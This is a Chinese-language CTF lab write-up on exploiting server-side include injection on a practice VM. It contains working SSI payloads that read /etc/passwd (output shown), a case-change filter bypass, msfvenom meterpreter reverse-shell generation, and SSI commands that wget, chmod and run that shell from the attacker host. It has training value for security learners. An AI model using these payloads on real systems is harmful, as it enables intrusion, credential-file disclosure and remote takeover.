6-4 CTF-SSI注入

登陆靶场地址如图

nmap -sV 192.168.176.135

nmap -A -v -T4 192.168.176.135

nikto -host http://192.168.176.135

dirb http://192.168.176.135

不允许我们查看robots

读取spucab目录

下载两个文件备用
查看ssi目录

得到信息，猜测可能存在命令注入
查看刚刚下载的两个文件

找到了站点的根目录

找到index页面得到信息

到达主页执行命令

submit后得到信息

发现exec被过滤
在第二个框中首先 将exec大写并加上!

得到重要信息

Dear, 192.168.176.128,
This receipt acknowledges the following information regarding your submission:

Date: Sunday 2nd of December 2018 05:43:15 AM
Target: --#exec cmd="cat /etc/passwd" --
Feedback: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false starfire:x:1000:1000:admin,,,:/home/starfire:/bin/bash guest-wpd40h:x:999:999:Guest:/tmp/guest-wpd40h:/bin/bash
Unique Token: 1151297382

Our team will get back to you with the next steps.
Thank you,
H.A.S.T.E.

制作webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击ip地址 lport=4444 -f raw > /root/Desktop/shell.php

192.168.176.128—攻击IP地址

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.176.128 lport=4444 -f raw > /root/Desktop/shell.py

启动监听
msfconsole

use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
show options
set lhost 192.168.176.128
run

通过ssi漏洞下载对应shell 执行 并 反弹shell
绕过过滤机制的方法：大小写绕过
将输入框改为

1
<!--#EXEC cmd="wget http://192.168.176.128/shell.py" -->

需要将shell移动到Apache根目录

使用 service apache2 start 启动服务 并查看是否为活动状态

submit 提交 下载shell

返回上一步 将权限设置为 777
及执行<!--#EXEC cmd="chmod 777 shell.py" -->
再使用 <!--#EXEC cmd="python shell.py" -->执行

已经反弹shell 成功

使用sysinfo

shell进入系统shell
并无管理员权限

优化终端python -c 'import pty;pty.spawn( "/bin/bash" )'

得到

一般CTF比赛中将flag中放在 /root/目录

在CTF比赛中SSI漏洞服务器有很多过滤机制，需要进行绕过，例如大小写绕过